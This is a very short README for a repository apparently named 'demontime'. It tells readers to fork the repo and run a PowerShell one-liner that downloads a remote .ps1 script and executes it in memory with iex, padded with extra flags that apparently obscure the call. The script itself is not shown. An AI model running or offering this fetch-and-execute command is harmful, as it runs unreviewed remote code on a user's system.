sscoconutree/demontime/README.md

 **Optional**

 Fork this repo so you can run the following one liner:

 `iex -Debug -Verbose -ErrorVariable $e -InformationAction Ignore -WarningAction Inquire ((New-Object 	System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/xxxxxx/experiment/main/demontime.ps1'));demontime`

+NOTE: Replace the URL with your own forked repo.